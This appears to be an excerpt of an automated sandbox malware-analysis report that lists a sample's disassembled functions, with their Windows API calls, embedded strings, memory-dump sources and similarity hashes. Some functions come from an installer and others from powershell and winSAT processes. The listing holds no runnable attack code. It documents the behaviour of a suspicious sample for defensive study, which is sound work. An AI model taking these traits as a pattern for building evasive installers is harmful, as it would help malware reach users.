                                                                                                                                                                                              Function 00406188 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00004000,00000002,?,00000000,?,?,Remove folder: ,?,?,004063FC,80000002), ref: 004061CE
                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,004063FC,80000002,Software\Microsoft\Windows\CurrentVersion,Remove folder: ,Remove folder: ,Remove folder: ,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\), ref: 004061D9
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseQueryValue
                                                                                                                                                                                              • String ID: Remove folder:
                                                                                                                                                                                              • API String ID: 3356406503-1958208860
                                                                                                                                                                                              • Opcode ID: caab4bc250bb6a278ef1a8ac262e6d4f4be946af9bdb02c3b8c6b2633afb5ee1
                                                                                                                                                                                              • Instruction ID: 8659262355d6ebf2290daf59b07b2549fc881bd87fa0bb5ea6267207f8cb0b09
                                                                                                                                                                                              • Opcode Fuzzy Hash: caab4bc250bb6a278ef1a8ac262e6d4f4be946af9bdb02c3b8c6b2633afb5ee1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 68017C72500209EADF218F51DD09EDB3BB8EF55364F01403AFE16A61A1D378DA64EBA4
                                                                                                                                                                                              Function 004058A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00468250,Error launching installer), ref: 004058CC
                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004058D9
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • Error launching installer, xrefs: 004058B6
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                                                                                                              • String ID: Error launching installer
                                                                                                                                                                                              • API String ID: 3712363035-66219284
                                                                                                                                                                                              • Opcode ID: 63fdd641d1b9510881a379fce0cbff5cab58f1c092c5a17148380fd449a2e826
                                                                                                                                                                                              • Instruction ID: 30392a530fa928b09b8412afc6dc4f2cd20664ca8a9f97139eafb5a2ce14b88a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 63fdd641d1b9510881a379fce0cbff5cab58f1c092c5a17148380fd449a2e826
                                                                                                                                                                                              • Instruction Fuzzy Hash: 33E09AB5540609BFEB009B64DD05F7B77ACEB04708F508565BD51F2150EB749C148A79
                                                                                                                                                                                              Function 00405D15 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D3D
                                                                                                                                                                                              • CharNextA.USER32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D4E
                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 190613189-0
                                                                                                                                                                                              • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                                                                              • Instruction ID: cc601e2af81a4130f3690bf6756e9ae730db34a97aa71f580e1783f9e5236296
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3DF0F631200818FFC7129FA4DD049AFBBA8EF06354B2580BAE840F7211D634DE02AF98

                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                              Function 00007FFD9B4208CD Relevance: 2.3, Strings: 1, Instructions: 1002COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000010.00000002.2264575384.00007FFD9B420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B420000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_7ffd9b420000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: i
                                                                                                                                                                                              • API String ID: 0-3865851505
                                                                                                                                                                                              • Opcode ID: f2ec08adaf645420088b5964b7397e0678089a787921d461f129d8d52c328adf
                                                                                                                                                                                              • Instruction ID: cd7a7ded9101186660155da3b67365d23bde0c08c2fa4c2b60b456dd7acca9b4
                                                                                                                                                                                              • Opcode Fuzzy Hash: f2ec08adaf645420088b5964b7397e0678089a787921d461f129d8d52c328adf
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D624722B0FACA0FEBAA97A848715747BE1EF56614B1901FFC059C72E3ED18AC45D341
                                                                                                                                                                                              Function 00007FFD9B421282 Relevance: .2, Instructions: 167COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000010.00000002.2264575384.00007FFD9B420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B420000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_7ffd9b420000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 9a3fcbaea475a1f5c940d659d976067597289109269a291cad5e4b8ba473f7cc
                                                                                                                                                                                              • Instruction ID: 633782b81481c879790ea86dff5f4c3990df1ac249e737f977082e180b9b8a91
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a3fcbaea475a1f5c940d659d976067597289109269a291cad5e4b8ba473f7cc
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6851D07190D7C84FD756DB6898666A47FF1EF87314F0942DFE089C70A3C664641AC782
                                                                                                                                                                                              Function 00007FFD9B3533B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000010.00000002.2264131219.00007FFD9B350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B350000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_7ffd9b350000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                                                                                              • Instruction ID: b0a576c083b0e6f9b3a34d123d02c6057c3a49e7cf838ce5d38a81e36f247068
                                                                                                                                                                                              • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                                                                                              • Instruction Fuzzy Hash: D401A73021CB0C4FD748EF4CE051AA5B7E0FF85320F10056DE58AC36A1DA36E882CB41

                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                              Function 00007FF780FDC700 Relevance: 79.2, APIs: 36, Strings: 9, Instructions: 444COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$CriticalResourceSection$EnterLeaveModule$ErrorFileFindHandleLastLoadLockNameSizeofvswprintf_s
                                                                                                                                                                                              • String ID: base\winsat\exe\WinSATOp.h$cannot find the resource$cannot get the resource size$cannot load the resource's size$cannot lock the resource in memory$canot laod string$resource string is zero zero length (invalid)$string reosurce is not null terminated$target string too small to load resource
                                                                                                                                                                                              • API String ID: 85048269-1477483317
                                                                                                                                                                                              • Opcode ID: 86203d874c95be50812b680078b9e2188098a7dc5f572935665761bdd8c0efb9
                                                                                                                                                                                              • Instruction ID: 80473cec346462881a99975a872c29042306b15627fe62931ca56429ea073b3e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 86203d874c95be50812b680078b9e2188098a7dc5f572935665761bdd8c0efb9
                                                                                                                                                                                              • Instruction Fuzzy Hash: B202A066A18A5786EB00EB11E8144BDF761FB89B84FE48031DE4E43BA4DF7CE546C760
                                                                                                                                                                                              Function 00007FF780F9A960 Relevance: 47.4, APIs: 14, Strings: 13, Instructions: 174libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$AddressErrorLastProc$LibraryLoad__uncaught_exception
                                                                                                                                                                                              • String ID: ... leaving it on$... turnning DWM off$> DWM Running.$> DWM not running$> DWM not running.$> DWM running$> leaving DWM on.$> turning off DWM.$DwmEnableComposition$DwmIsCompositionEnabled$DwmpRestartComposition$base\winsat\exe\main.cpp$dwmapi.dll
                                                                                                                                                                                              • API String ID: 3480005739-3538918301
                                                                                                                                                                                              • Opcode ID: eccd2e5c746716fad5d7c8b25d760ee242fe97af7fc28cd88510264bff17a53f
                                                                                                                                                                                              • Instruction ID: 856165624daf525d1552d5ee545727e9c71b335d919e7527919de2d3de7993d3
                                                                                                                                                                                              • Opcode Fuzzy Hash: eccd2e5c746716fad5d7c8b25d760ee242fe97af7fc28cd88510264bff17a53f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 46819B61E0D68396FB04BF15E8902B8ABA1FF45754FF49435D90E066A4DFBCE844C720
                                                                                                                                                                                              Function 00007FF780FE5108 Relevance: 40.8, APIs: 27, Instructions: 288threadsleepCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Thread$Current$Priority$PerformanceQuery$ClassCounterProcess$AffinityMask$ErrorFrequencyLastSleep
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1607561639-0
                                                                                                                                                                                              • Opcode ID: 7b69ec100b1cf1692b8481da67ed15e1dbc6add3be9eea2e672f9ba1b56277f1
                                                                                                                                                                                              • Instruction ID: 66d511e059c0e1055e4e54cbdb8ac9ef2958d474486771c0b390511371a54f8f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b69ec100b1cf1692b8481da67ed15e1dbc6add3be9eea2e672f9ba1b56277f1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4FC16D76B19B45CBEB00AF60D8142BCB762FB49B99FA48135CE0E0B798DF38A445C710
                                                                                                                                                                                              Function 00007FF780F9AE84 Relevance: 40.4, APIs: 10, Strings: 13, Instructions: 149librarynativeloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Error$Last$EnabledEvent$AddressCloseControlCountCurrentDeviceFileLibraryLoadProcProcessStatusTick_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > Composition restarted$> Composition restarted$> Not necessary to reenable EMD cache.$> Successfully reenabled EMD.$> Unable to reenable EMD device; %s$CKCLStart$ERROR: Could not disable cache hits: %x$INFO: DwmpRestartComposition() did not return OK!$Restore system policies$Warning: Composition Restart not supported$Warning: Composition Restart not supported$base\winsat\exe\main.cpp$dwmapi.dll
                                                                                                                                                                                              • API String ID: 1785720630-3405197771
                                                                                                                                                                                              • Opcode ID: 9af75d1257538d4edd4ffe61fe718f874191034c87eb8f32d107f12ce79722e6
                                                                                                                                                                                              • Instruction ID: 0af5434132e4972eed174ed68b071fc57920e10b0e06670fbbbe0929c01a6be6
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9af75d1257538d4edd4ffe61fe718f874191034c87eb8f32d107f12ce79722e6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F612220A0CA8382FB10BB51A8153B9AB60BF85754FF49036C94E466E5DFBCF448CB61
                                                                                                                                                                                              Function 00007FF780FD6884 Relevance: 31.8, APIs: 14, Strings: 4, Instructions: 260COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memset.MSVCRT(?,?,?,00000000,00000000,00000400,00000080,?,00007FF780FD9509), ref: 00007FF780FD68FA
                                                                                                                                                                                              • memset.MSVCRT(?,?,?,00000000,00000000,00000400,00000080,?,00007FF780FD9509), ref: 00007FF780FD690B
                                                                                                                                                                                              • memset.MSVCRT(?,?,?,00000000,00000000,00000400,00000080,?,00007FF780FD9509), ref: 00007FF780FD691C
                                                                                                                                                                                              • memset.MSVCRT(?,?,?,00000000,00000000,00000400,00000080,?,00007FF780FD9509), ref: 00007FF780FD6940
                                                                                                                                                                                                • Part of subcall function 00007FF78100B900: GetModuleHandleW.KERNEL32 ref: 00007FF78100B949
                                                                                                                                                                                                • Part of subcall function 00007FF78100B900: GetTickCount.KERNEL32 ref: 00007FF78100B9B9
                                                                                                                                                                                                • Part of subcall function 00007FF78100B900: LoadLibraryW.KERNEL32 ref: 00007FF78100BA10
                                                                                                                                                                                                • Part of subcall function 00007FF78100B900: GetLastError.KERNEL32 ref: 00007FF78100BA28
                                                                                                                                                                                              • SetupDiDestroyDeviceInfoList.SETUPAPI ref: 00007FF780FD6CEF
                                                                                                                                                                                              • SetLastError.KERNEL32 ref: 00007FF780FD6D01
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memset$ErrorLast$CountDestroyDeviceHandleInfoLibraryListLoadModuleSetupTick
                                                                                                                                                                                              • String ID: Index [%d]: PNPID = %S$Matching device PnPID is %S$PNPID from DX9 call = %S$base\winsat\common\winsatutilities.cpp
                                                                                                                                                                                              • API String ID: 4086297632-3351476903
                                                                                                                                                                                              • Opcode ID: 86958b7cdd69083b66b4547d905b583323dc14dbf35370d738db5a6c2fc742ab
                                                                                                                                                                                              • Instruction ID: 6fd06364e88d3bace0f28ab460bff4646beb6d8e1289b0a6ece0a8144ab5cbb4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 86958b7cdd69083b66b4547d905b583323dc14dbf35370d738db5a6c2fc742ab
                                                                                                                                                                                              • Instruction Fuzzy Hash: 49D18432A08B8289E720EF21DC403F9B364FB85758FA08231EA5D47B99DF78E645C710
                                                                                                                                                                                              Function 00007FF78100B900 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 125libraryloadersleepCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: __uncaught_exception$AddressCountProcTick$ErrorHandleLastLibraryLoadModuleSleep
                                                                                                                                                                                              • String ID: D3DCommon::DX9Init$Direct3DCreate9$Direct3DCreate9Ex$Failed querying interface.$base\winsat\d3d\dx9base.cpp$d3d9.dll
                                                                                                                                                                                              • API String ID: 2352445144-745675029
                                                                                                                                                                                              • Opcode ID: 21c5a692845b6f80f21a1e62387020077775f25eb3d32d9e9cc7a2f2045c2878
                                                                                                                                                                                              • Instruction ID: 5a116c8788795e16b88fc3988f01f47c1269e4c87a2f198255e8430a2cc2e4b4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 21c5a692845b6f80f21a1e62387020077775f25eb3d32d9e9cc7a2f2045c2878
                                                                                                                                                                                              • Instruction Fuzzy Hash: D0513925E09B4282EB50AB15EC44178F7A0FF49B51FF45636DA4E823A4DFBCE845CB60
                                                                                                                                                                                              Function 00007FF780F9DA44 Relevance: 22.9, APIs: 3, Strings: 10, Instructions: 150timeCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: EnabledEventTime$CountCurrentExceptionFileProcessSystemThrowTick_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: ERROR: Schema Validation of the formal assessment failed.$ERROR: %#08X DataStore::BuildFormalFromMostRecentPartialAssessments failed.$ERROR: %#08X DataStore::WriteAllPartialAssessments failed.$ERROR: %#08X GetWinSATDocumentWithCurrentConfig failed.$ERROR: %#08X DataStore::SaveFormalData failed.$HistoryVersionRead$HistoryVersionWrite$Skipping update to the TimeLastFormalAssessment in the registry - AXE mode$TimeLastFormalAssessment$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 3073564763-3073826658
                                                                                                                                                                                              • Opcode ID: 35efbdd0e4f3ab95cfe2b41bdf34785f45e86456031fc247f7ac3c80208a8cfb
                                                                                                                                                                                              • Instruction ID: d93c61397bcfd803004874b811c27787013b8002e7e83c34e586acb82edd3132
                                                                                                                                                                                              • Opcode Fuzzy Hash: 35efbdd0e4f3ab95cfe2b41bdf34785f45e86456031fc247f7ac3c80208a8cfb
                                                                                                                                                                                              • Instruction Fuzzy Hash: 65613822A0C64396FB10BB21E8502B9A761BF547A8FF48132D90E477E6DFADF445C760
                                                                                                                                                                                              Function 00007FF780F9A858 Relevance: 19.3, APIs: 4, Strings: 7, Instructions: 58filenativeCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
